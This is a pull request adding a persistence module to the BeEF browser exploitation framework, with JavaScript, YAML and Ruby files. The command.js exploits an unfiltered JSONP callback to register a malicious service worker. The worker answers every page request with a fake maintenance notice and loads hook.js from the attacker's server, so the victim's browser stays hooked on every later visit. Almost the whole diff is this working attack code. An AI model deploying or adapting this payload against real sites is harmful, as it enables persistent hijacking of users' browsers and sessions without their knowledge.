### PR TITLE
Persistence through unfiltered JSONP callback and service worker

### DIFF
--- a/modules/persistence/jsonp_service_worker/command.js
+++ b/modules/persistence/jsonp_service_worker/command.js
@@ -1,0 +1,12 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var scriptElem = document.createElement("script");
+  scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27http%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27%3Cscript%20src%3D%5C%27http%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%2Fhook.js%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
+  $j("body").append(scriptElem);
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Script element inserted within the body, domain for the browser permanently compromized if everything went as expected.");
+});

--- a/modules/persistence/jsonp_service_worker/command.js
+++ b/modules/persistence/jsonp_service_worker/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
   var scriptElem = document.createElement("script");
-  scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27http%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27%3Cscript%20src%3D%5C%27http%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%2Fhook.js%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
+  scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27<%=@tempBody%>%3Cscript%20src%3D%5C%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%2Fhook.js%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
   $j("body").append(scriptElem);
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Script element inserted within the body, domain for the browser permanently compromized if everything went as expected.");
 });

--- a/modules/persistence/jsonp_service_worker/command.js
+++ b/modules/persistence/jsonp_service_worker/command.js
@@ -6,7 +6,9 @@
 
 beef.execute(function() {
   var scriptElem = document.createElement("script");
-  scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27<%=@tempBody%>%3Cscript%20src%3D%5C%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%2Fhook.js%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
+  var hook = encodeURIComponent(beef.net.hook);
+  var tempBody = encodeURIComponent('<%=@tempBody%>');
+  scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27'+tempBody+'%3Cscript%20src%3D%5C%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+hook+'%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
   $j("body").append(scriptElem);
-  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Script element inserted within the body, domain for the browser permanently compromized if everything went as expected.");
+  beef.net.send("<%= @command_url %>", <%=@command_id%>, "result=Script element inserted within the body, domain for the browser permanently compromized if everything went as expected.");
 });

--- a/modules/persistence/jsonp_service_worker/config.yaml
+++ b/modules/persistence/jsonp_service_worker/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Persistence"
             name: "JSONP Service Worker"
-            description: "This module will exploit an unescaped callback parameter in a JSONP endpoint (of the same domain compromized) to ensure that BeEF will hook every time the user revisits the domain"
+            description: "This module will exploit an unfiltered callback parameter in a JSONP endpoint (of the same domain compromized) to ensure that BeEF will hook every time the user revisits the domain"
             authors: ["clod81"]
             target:
                 working: ["C"]

--- a/modules/persistence/jsonp_service_worker/config.yaml
+++ b/modules/persistence/jsonp_service_worker/config.yaml
@@ -13,4 +13,4 @@ beef:
             authors: ["clod81"]
             target:
                 working: ["C"]
-                not_working: ["S", "FF", "IE"]
+                not_working: ["ALL"]

--- a/modules/persistence/jsonp_service_worker/config.yaml
+++ b/modules/persistence/jsonp_service_worker/config.yaml
@@ -1,0 +1,16 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        jsonp_service_worker:
+            enable: true
+            category: "Persistence"
+            name: "JSONP Service Worker"
+            description: "This module will exploit an unescaped callback parameter in a JSONP endpoint (of the same domain compromized) to ensure that BeEF will hook every time the user revisits the domain"
+            authors: ["clod81"]
+            target:
+                working: ["C"]
+                not_working: ["S", "FF", "IE"]

--- a/modules/persistence/jsonp_service_worker/module.rb
+++ b/modules/persistence/jsonp_service_worker/module.rb
@@ -1,0 +1,13 @@
+class Jsonp_service_worker < BeEF::Core::Command
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+  def self.options
+    return [
+      {'name' => 'JSONPPath', 'ui_label' => 'Path of the current domain compromized JSONP endpoint (ex: /jsonp?callback=)', 'value' => '/jsonp?callback='}
+    ]
+  end
+
+end

--- a/modules/persistence/jsonp_service_worker/module.rb
+++ b/modules/persistence/jsonp_service_worker/module.rb
@@ -7,7 +7,7 @@ class Jsonp_service_worker < BeEF::Core::Command
   def self.options
     return [
       {'name' => 'JSONPPath', 'ui_label' => 'Path of the current domain compromized JSONP endpoint (ex: /jsonp?callback=)', 'value' => '/jsonp?callback='},
-      {'name' => 'tempBody', 'ui_label' => 'Temporary HTML body to show to the users (ASCII HEX encoding needed)', 'value' => '%3Ch3%3EUnplanned%20site%20maintenance,%20please%20wait%20a%20few%20seconds,%20we%20are%20almost%20done.%3C%2Fh3%3E'}
+      {'name' => 'tempBody', 'ui_label' => 'Temporary HTML body to show to the users', 'value' => '<h3>Unplanned site maintenance, please wait a few seconds, we are almost done.</h3>'}
     ]
   end
 

--- a/modules/persistence/jsonp_service_worker/module.rb
+++ b/modules/persistence/jsonp_service_worker/module.rb
@@ -6,7 +6,8 @@ class Jsonp_service_worker < BeEF::Core::Command
 
   def self.options
     return [
-      {'name' => 'JSONPPath', 'ui_label' => 'Path of the current domain compromized JSONP endpoint (ex: /jsonp?callback=)', 'value' => '/jsonp?callback='}
+      {'name' => 'JSONPPath', 'ui_label' => 'Path of the current domain compromized JSONP endpoint (ex: /jsonp?callback=)', 'value' => '/jsonp?callback='},
+      {'name' => 'tempBody', 'ui_label' => 'Temporary HTML body to show to the users (ASCII HEX encoding needed)', 'value' => '%3Ch3%3EUnplanned%20site%20maintenance,%20please%20wait%20a%20few%20seconds,%20we%20are%20almost%20done.%3C%2Fh3%3E'}
     ]
   end
 


### PR DESCRIPTION
Idea extracted from https://c0nradsc0rner.wordpress.com/2016/06/17/xss-persistence-using-jsonp-and-serviceworkers/

The website where user has been exploited through a XSS, if exposes an unfiltered JSONP callback, can be persistently hooked through service worker onfetch event (Chrome only).